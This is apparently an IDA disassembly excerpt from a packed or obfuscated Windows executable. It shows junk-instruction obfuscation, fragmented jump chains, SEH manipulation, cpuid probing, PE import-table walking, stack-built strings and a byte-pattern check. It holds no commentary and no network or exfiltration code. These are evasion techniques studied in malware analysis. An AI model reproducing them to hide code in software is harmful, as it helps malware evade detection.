loc_42C2DB: ; CODE XREF: sub_42E1DA:loc_428DB2�j
pop edx
mov ebp, offset loc_4283D7
xchg ebp, [esp-10h+arg_C]
jmp nullsub_136
; END OF FUNCTION CHUNK FOR sub_42768C
; ---------------------------------------------------------------------------
loc_42C2E9: ; CODE XREF: _0182ofla:00429F22�j
test eax, ebx
jmp loc_4268C5
; =============== S U B R O U T I N E =======================================
sub_42C2F0 proc near ; CODE XREF: sub_4289E4:loc_429FB4�p
; _0182ofla:0042A455�j
; FUNCTION CHUNK AT 00429304 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004297E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E26D SIZE 0000000B BYTES
mov [esp+0], esi
pop esi
jnz loc_42E26D
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
jmp loc_429304
sub_42C2F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_42C309: ; CODE XREF: sub_4289E4:loc_4282C5�j
mov eax, [ebp-0Ch]
jmp loc_42DA92
; END OF FUNCTION CHUNK FOR sub_4289E4
; =============== S U B R O U T I N E =======================================
sub_42C311 proc near ; DATA XREF: sub_423395+7678�o
add eax, ebp
add eax, 2420074Fh
mov dword ptr [eax], 70736957h
lea eax, [ebp-1Ch]
mov dword ptr [eax], 646E6957h
lea eax, [ebp-18h]
mov dword ptr [eax], 6C43776Fh
push offset sub_42C565
jmp nullsub_98
sub_42C311 endp
; =============== S U B R O U T I N E =======================================
sub_42C33B proc near ; DATA XREF: sub_425BF8+78CA�o
; FUNCTION CHUNK AT 004267E5 SIZE 00000002 BYTES
pop ecx
call sub_42805F
loc_42C341: ; CODE XREF: sub_426851+1054�j
jmp loc_4267E5
sub_42C33B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub ecx, 2DE20CDDh
jmp sub_423726
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_42C351: ; CODE XREF: sub_42938A:loc_42B8D4�j
or esi, 307655B9h
and esi, 0F9891333h
add esi, 0FC2BE26h
xchg esi, [esp+4+var_4]
jmp sub_42D15D
; END OF FUNCTION CHUNK FOR sub_42938A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42C36B: ; CODE XREF: sub_42798F-4707�j
pushf
push ecx
loc_42C36D: ; CODE XREF: sub_42798F:loc_42B1C1�j
call sub_42E278
loc_42C372: ; CODE XREF: sub_42DF41-2FC3�j
jmp nullsub_99
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42C377: ; CODE XREF: _0182ofla:0042EDF7�j
xchg esi, [ebx]
; =============== S U B R O U T I N E =======================================
sub_42C379 proc near ; CODE XREF: sub_4258B7:loc_425453�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00427CA3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004290A6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00429309 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429DE3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042AC7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B321 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042B3FF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042B739 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D234 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D3CE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042E22F SIZE 00000006 BYTES
mov [esp+8+var_8], ebx
pop ebx
push ebp
mov ebp, esp
push ecx
jmp loc_42B739
sub_42C379 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E13
loc_42C386: ; CODE XREF: sub_425E13:loc_42EC5B�j
mov ebp, eax
xchg ebp, [esp+0]
call sub_427239
; END OF FUNCTION CHUNK FOR sub_425E13
; START OF FUNCTION CHUNK FOR sub_429038
loc_42C390: ; CODE XREF: _0182ofla:00426104�j
; sub_429038+C�j ...
mov eax, 120h
jmp loc_42B722
; END OF FUNCTION CHUNK FOR sub_429038
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_42C39A: ; CODE XREF: sub_42A760:loc_42A16E�j
add eax, ebp
add eax, 19E33FDFh
mov eax, [eax]
call sub_425E13
; END OF FUNCTION CHUNK FOR sub_42A760
; START OF FUNCTION CHUNK FOR sub_427259
loc_42C3A9: ; CODE XREF: sub_427259+5194�j
jmp loc_423FBC
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
test al, al
jz loc_42B26F
jmp loc_42DEB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_42C3BB: ; CODE XREF: sub_42EAB7-62EA�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
xor eax, eax
add ecx, 4
jmp loc_429777
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
adc edi, 0DA5865C4h
jmp loc_42798E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_42C3E3: ; CODE XREF: sub_427259+5977�j
mov eax, [eax]
or eax, eax
jnz loc_42AE74
jmp loc_42C3A9
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42C3F2: ; CODE XREF: sub_4282B8-517C�j
cmp esi, 51FCBD88h
jmp loc_426A53
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_42C3FD: ; CODE XREF: sub_4267F8:loc_42EA0A�j
mov eax, [ebp-8]
mov al, [eax]
add [ebp-0Ah], al
xor eax, eax
mov al, [ebp-0Ah]
shr eax, 4
xor [ebp-0Ah], al
jmp loc_42368C
; END OF FUNCTION CHUNK FOR sub_4267F8
; =============== S U B R O U T I N E =======================================
sub_42C415 proc near ; CODE XREF: sub_425418:loc_4246BE�p
; _0182ofla:0042D66D�j
; FUNCTION CHUNK AT 00423D23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424037 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425116 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00425551 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004260BD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042A3B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B213 SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
add eax, ebp
add eax, 5C46526Dh
push eax
call sub_42371C
push eax
jmp loc_423D23
sub_42C415 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C42D: ; CODE XREF: _0182ofla:loc_423574�j
mov ebp, [esi]
sub eax, edx
jmp loc_42AC8F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265C0
loc_42C436: ; CODE XREF: sub_4265C0:loc_42BCF8�j
mov ebp, esp
xchg esi, edx
push edx
xchg esi, edx
jmp loc_42B223
; END OF FUNCTION CHUNK FOR sub_4265C0
; ---------------------------------------------------------------------------
jbe loc_4287CC
jmp loc_42A8DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42C44D: ; CODE XREF: sub_423395+F9B�j
rol esi, 16h
test ecx, 3BBE08FCh
jmp loc_427D65
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C718
loc_42C45B: ; CODE XREF: sub_42C718-5C�j
push edx
loc_42C45C: ; DATA XREF: _0182ofla:00429F8F�o
pop dword ptr fs:0
xchg eax, [esp+4+var_4]
pop eax
call sub_423FCD
test al, al
jz loc_42770A
call nullsub_233
jmp loc_424594
; END OF FUNCTION CHUNK FOR sub_42C718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429957
loc_42C47D: ; CODE XREF: sub_429957+A�j
mov eax, 80000003h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
xor [esi], ebx
loc_42C48E: ; CODE XREF: sub_42B3C2-8010�j
jmp loc_428A44
; END OF FUNCTION CHUNK FOR sub_429957
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_42C493: ; CODE XREF: sub_42A420+2448�j
sbb edi, 0E31722CEh
push eax
loc_42C49A: ; CODE XREF: sub_42A420:loc_42E058�j
call sub_428D17
mov edx, 64EFA9EDh
call sub_42D71D
push eax
ror eax, 5
jmp loc_427781
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A1D
loc_42C4B2: ; CODE XREF: sub_425A1D+A�j
push 26DCF0A8h
pop ecx
sub ecx, ds:4000F4h
xor ecx, 0F9492541h
add ecx, 970ED158h
mov [ecx], eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_425A1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA2D
loc_42C4CE: ; CODE XREF: sub_42DA2D+B�j
jmp loc_425941
; END OF FUNCTION CHUNK FOR sub_42DA2D
; ---------------------------------------------------------------------------
loc_42C4D3: ; CODE XREF: _0182ofla:0042998C�j
jmp loc_425034
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42C4D8: ; CODE XREF: sub_4282B8-B�j
jmp loc_426488
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423249
loc_42C4DD: ; CODE XREF: sub_423249:loc_42EC15�j
mov [ebp-5], al
jmp loc_429D23
; END OF FUNCTION CHUNK FOR sub_423249
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42C4E5: ; CODE XREF: sub_42537E:loc_428CEF�j
push 0D20F4FB4h
pop eax
or eax, 0AFCC71F7h
xor eax, 635701D9h
jmp loc_426A3E
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
loc_42C4FC: ; DATA XREF: sub_427593�o
add ecx, 3018E420h
xchg ecx, [esp]
jmp loc_42ED15
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42C50A: ; CODE XREF: sub_428D63:loc_427568�j
push 76BA1BCFh
jmp loc_425F55
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42C514: ; CODE XREF: sub_42798F-2326�j
or ebx, eax
sub ecx, 9333B2Eh
cmp ebp, edi
jmp loc_426397
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_42C523: ; CODE XREF: sub_424707+8447�j
ror edx, 17h
adc eax, 87952B2Ah
cmp ecx, 451DC9E5h
call sub_429B91
jmp loc_425CB1
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42C53C: ; CODE XREF: sub_423FCD+4A36�j
xor edx, 49A0E246h
cmp edx, 0F9055974h
jmp loc_42B389
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
locret_42C54D: ; CODE XREF: _0182ofla:00426AB8�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C7D
loc_42C54E: ; CODE XREF: sub_428C7D-740�j
jmp loc_42465A
; END OF FUNCTION CHUNK FOR sub_428C7D
; =============== S U B R O U T I N E =======================================
sub_42C553 proc near ; CODE XREF: _0182ofla:00428D5D�j
; sub_424762+9CAB�p
; FUNCTION CHUNK AT 00424218 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042487B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424971 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00424F46 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428B3F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042944A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A67C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AFDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CA7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CC43 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042DDCF SIZE 0000001F BYTES
mov [esp+0], ecx
pop ecx
and eax, 7
push ecx
push 0E98F74C6h
jmp loc_42CA7D
sub_42C553 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42C565 proc near ; DATA XREF: sub_42C311+20�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425E1D SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042E2E3 SIZE 00000005 BYTES
lea eax, [ebp-14h]
mov dword ptr [eax], 737361h
push 2408C8B5h
xor dword ptr [esp+0], 2408C8B5h
jmp loc_42E2E3
sub_42C565 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42C57F: ; CODE XREF: sub_428729+DBE�j
jz loc_42AE8A
jmp loc_42783B
; END OF FUNCTION CHUNK FOR sub_428729
; =============== S U B R O U T I N E =======================================
sub_42C58A proc near ; DATA XREF: _0182ofla:0042E7CB�o
; FUNCTION CHUNK AT 00424F1A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428065 SIZE 00000005 BYTES
mov edx, 1AE260E8h
call sub_42D71D
push eax
ror eax, 7
jmp loc_428065
sub_42C58A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_42C59D: ; CODE XREF: sub_425629+2650�j
jnz loc_423520
popf
jle loc_4240C6
jmp loc_42ED49
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D8EA
loc_42C5AF: ; CODE XREF: sub_42D8EA:loc_4273C5�j
pop eax
add eax, 12C7E6Bh
call sub_42ADE3
loc_42C5BB: ; CODE XREF: _0182ofla:00427523�j
jmp loc_429E0E
; END OF FUNCTION CHUNK FOR sub_42D8EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42C5C0: ; CODE XREF: sub_428729-4257�j
jmp nullsub_183
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42C5C5: ; CODE XREF: sub_42798F:loc_42AEED�j
jnz loc_4236F0
jmp loc_42EC62
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42C5D0: ; CODE XREF: _0182ofla:0042615C�j
push 0A15403C4h
jmp loc_42B027
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_42C5DA: ; CODE XREF: sub_427239+73DB�j
jz loc_42C7A0
jmp loc_426F1D
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258B7
loc_42C5E5: ; CODE XREF: sub_4258B7:loc_425458�j
pop ebx
pop edx
pop eax
loc_42C5E8: ; CODE XREF: sub_42AC07:loc_427BB3�j
pop ecx
pop ebp
jmp loc_4283D7
; END OF FUNCTION CHUNK FOR sub_4258B7
; =============== S U B R O U T I N E =======================================
sub_42C5EF proc near ; CODE XREF: sub_4298DD-341C�j
; FUNCTION CHUNK AT 0042777C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428197 SIZE 00000011 BYTES
push ebp
jmp loc_42777C
sub_42C5EF endp
; ---------------------------------------------------------------------------
pushf
jmp sub_425063
; ---------------------------------------------------------------------------
loc_42C5FB: ; DATA XREF: sub_42771F+7�o
mov eax, [eax]
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42C5FD: ; CODE XREF: sub_42537E:loc_429517�j
and eax, 0FFFFFFh
cmp eax, 0C3C033h
jnz loc_428CEF
jmp loc_42E8E8
; END OF FUNCTION CHUNK FOR sub_42537E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edx
jmp loc_42D672
; ---------------------------------------------------------------------------
loc_42C61C: ; DATA XREF: sub_42A915-6F88�o
push 60919A5Ah
pop edi
add edi, 2F6F48F0h
add edi, ebp
add edi, 6FFF1CB2h
mov [edi], eax
pop edi
inc dword ptr [ebp-0Ch]
jmp loc_423544
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42C63B: ; CODE XREF: sub_423FCD+9CDA�j
pushf
push 0C14CE052h
pop eax
xor eax, 0C14CE052h
popf
xchg eax, [esp-4+arg_0]
push offset sub_42B0C0
jmp loc_42ACF6
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_42C656: ; CODE XREF: sub_427DA9+1D�j
mov eax, [eax]
test eax, 1
jz loc_42848C
jmp loc_4298B7
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42C668: ; CODE XREF: sub_42D9A4-A0D7�j
jo loc_42B7AD
xor edi, ecx
xchg edi, ebx
jmp loc_42B53E
; END OF FUNCTION CHUNK FOR sub_42D9A4
; =============== S U B R O U T I N E =======================================
sub_42C677 proc near ; CODE XREF: sub_42D950:loc_42713A�p
; _0182ofla:0042A5B4�j
; FUNCTION CHUNK AT 0042387B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042A6CC SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042C224 SIZE 0000001B BYTES
xchg eax, [esp+0]
pop eax
call sub_428D17
mov edx, 0CF0182F6h
call sub_42B097
call sub_42AAD2
loc_42C68F: ; CODE XREF: sub_42798F-35C8�j
jmp loc_42387B
sub_42C677 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42C695: ; CODE XREF: sub_4271D2+2A71�j
jmp loc_42588B
; END OF FUNCTION CHUNK FOR sub_4271D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_42C69A: ; CODE XREF: sub_427259:loc_4273CA�j
jl loc_42D081
loc_42C6A0: ; CODE XREF: sub_427E42+37D4�j
jmp loc_42ECE1
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
add edx, 0C20AA3D3h
shl edi, 1Ah
jmp loc_42D078
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C718
loc_42C6B3: ; CODE XREF: sub_42C718-5649�j
sbb edx, 0AD55EADBh
shl ebx, 12h
jmp loc_42C45B
; END OF FUNCTION CHUNK FOR sub_42C718
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DE3A
loc_42C6C2: ; CODE XREF: sub_42DE3A+51D�j
jmp nullsub_221
; END OF FUNCTION CHUNK FOR sub_42DE3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42C6C7: ; CODE XREF: sub_4253F4-161D�j
jmp loc_4271FF
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_42C6CC: ; CODE XREF: _0182ofla:loc_42585F�j
; sub_426319:loc_42C119�j
ror eax, 12h
mov ds:dword_423194, eax
locret_42C6D5: ; CODE XREF: sub_4271D2:loc_42B56A�j
retn
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAFE
loc_42C6D6: ; CODE XREF: sub_42EAFE-3CEF�j
jmp sub_429ED3
; END OF FUNCTION CHUNK FOR sub_42EAFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42C6DB: ; CODE XREF: sub_42AC07-3DEB�j
; sub_4271D2+2049�j
rol eax, 12h
push eax
call sub_424CD8
retn
; END OF FUNCTION CHUNK FOR sub_4271D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC07
loc_42C6E5: ; CODE XREF: sub_42AC07-7B6C�j
jmp loc_423185
; END OF FUNCTION CHUNK FOR sub_42AC07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42C6EB proc near ; CODE XREF: sub_428E8D+2�p
push large dword ptr fs:0
call sub_42A438
loc_42C6F7: ; CODE XREF: sub_42A438:loc_42B3B8�j
call sub_42EA47
call sub_424072
mov edx, [ebx+3Ch]
mov edx, [ebx+edx+80h]
or edx, edx
jz loc_42D510
jmp loc_42E87F
sub_42C6EB endp
; =============== S U B R O U T I N E =======================================
sub_42C718 proc near ; CODE XREF: _0182ofla:loc_42DEFF�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424594 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004270C1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042770A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004290E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429DBE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042C45B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042C6B3 SIZE 0000000E BYTES
push dword ptr fs:0
mov fs:0, esp
jmp loc_429DBE
sub_42C718 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_42C729: ; CODE XREF: sub_42CA29+11�j
jnb loc_42A346
test edi, eax
jmp loc_426DF4
; END OF FUNCTION CHUNK FOR sub_42CA29
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
adc ecx, 60553ECFh
jmp sub_429AC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_42C743: ; CODE XREF: sub_42EAB7:loc_4285F9�j
or eax, edx
jmp loc_425AC8
; ---------------------------------------------------------------------------
loc_42C74A: ; CODE XREF: sub_42EAB7:loc_42A9B2�j
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_4287A3
call sub_428205
loc_42C759: ; CODE XREF: _0182ofla:0042A5CD�j
jmp loc_423BF9
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42C75E: ; CODE XREF: sub_428D63-3D68�j
jmp loc_42B760
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42C763: ; CODE XREF: sub_423FCD:loc_42B389�j
jge loc_42C2AE
test edx, esi
jmp loc_4237AC
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42583B
loc_42C770: ; CODE XREF: sub_42583B+12�j
jnz loc_42C929
jmp loc_426ED5
; END OF FUNCTION CHUNK FOR sub_42583B
; =============== S U B R O U T I N E =======================================
sub_42C77B proc near ; CODE XREF: sub_42E102�j
; DATA XREF: sub_4290FD+4FFB�o
add ebx, 0FF58C06Eh
xchg ebx, [esp+0]
jmp sub_426561
sub_42C77B endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DE3A
loc_42C78A: ; CODE XREF: sub_42DE3A+1F�j
jmp loc_424C41
; END OF FUNCTION CHUNK FOR sub_42DE3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42C78F: ; CODE XREF: sub_4282B8+551C�j
jmp loc_42829A
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_42C794: ; CODE XREF: sub_427239-2BC7�j
jg loc_42E697
or edx, 383268A9h
loc_42C7A0: ; CODE XREF: sub_427239:loc_42C5DA�j
push edi
push 0C07A9980h
ror edi, 18h
jmp loc_427540
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42C7AE: ; CODE XREF: sub_42798F+5F85�j
pushf
mov ebx, 0C98D3D28h
and eax, 0B54DCAECh
cmp ebx, 0AD134625h
jmp loc_424A02
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428110
loc_42C7C5: ; CODE XREF: sub_428110-2807�j
ror eax, 15h
xor esi, 79CDB9h
pushf
add edx, 0E81BF3A0h
jmp loc_42DCAC
; END OF FUNCTION CHUNK FOR sub_428110
; ---------------------------------------------------------------------------
shr eax, 1Ch
jmp loc_42A41B
; ---------------------------------------------------------------------------
loc_42C7E2: ; CODE XREF: _0182ofla:0042617B�j
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 0A0h
jmp loc_426446
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_200. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42C7FE proc near ; CODE XREF: sub_42931E-24A7�p
; _0182ofla:0042A25B�j
; FUNCTION CHUNK AT 00428F09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A37D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B2CE SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [eax+18h]
dec eax
test eax, eax
jl loc_426260
inc eax
mov [ebp-1Ch], eax
jmp loc_42A37D
sub_42C7FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C817: ; CODE XREF: _0182ofla:004242A7�j
sub edx, 0BD004881h
loc_42C81D: ; CODE XREF: _0182ofla:loc_429C26�j
mov byte ptr [ebp-806h], 0
mov byte ptr [ebp-805h], 0
mov byte ptr [ebp-804h], 0
jmp loc_426A9E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42C839: ; CODE XREF: sub_42B669-1DC5�j
rol eax, 19h
call sub_42816D
; END OF FUNCTION CHUNK FOR sub_42B669
; START OF FUNCTION CHUNK FOR sub_42E218
loc_42C841: ; CODE XREF: sub_42E218-62D�j
jnz loc_429A05
add ebp, 0E48D9FFFh
jmp loc_4280E1
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
popf
jmp loc_427B9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_42C858: ; CODE XREF: sub_42AAF8:loc_423FC8�j
and esi, edi
cmp ecx, 4E20EF00h
jmp loc_425F72
; END OF FUNCTION CHUNK FOR sub_42AAF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_42C865: ; CODE XREF: sub_42A420+3C3E�j
rol ebp, 1Bh
jmp loc_42C493
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
loc_42C86D: ; CODE XREF: _0182ofla:004259EE�j
rol ebx, 1Eh
; =============== S U B R O U T I N E =======================================
sub_42C870 proc near ; CODE XREF: sub_42CC59+1C9D�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004236D5 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
loc_42C874: ; CODE XREF: _0182ofla:loc_4277AD�j
mov edx, offset loc_4230DF
xchg edx, [esp-4+arg_0]
jmp loc_4236D5
sub_42C870 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42445E
loc_42C881: ; CODE XREF: sub_42445E:loc_426ABE�j
add eax, ebp
add eax, 2FEFFD1Ch
mov eax, [eax]
pop ecx
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_42445E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427750
loc_42C890: ; CODE XREF: sub_427750+D�j
jmp nullsub_141
; END OF FUNCTION CHUNK FOR sub_427750
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42C895: ; CODE XREF: sub_4271AD+C�j
; sub_429B69+8�j ...
mov edx, [esp+0]
mov al, 1
jmp loc_427011
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_42C89F proc near ; CODE XREF: sub_428F20:loc_42AB80�j
; sub_42DA9C+3�j
; FUNCTION CHUNK AT 0042A613 SIZE 00000008 BYTES
add esp, 0FFFFFFF8h
push esi
push 0C25AE6Ch
pop esi
sub esi, 5AB1AB31h
xor esi, 6AF7446Dh
add esi, 24BFA061h
jmp loc_42A613
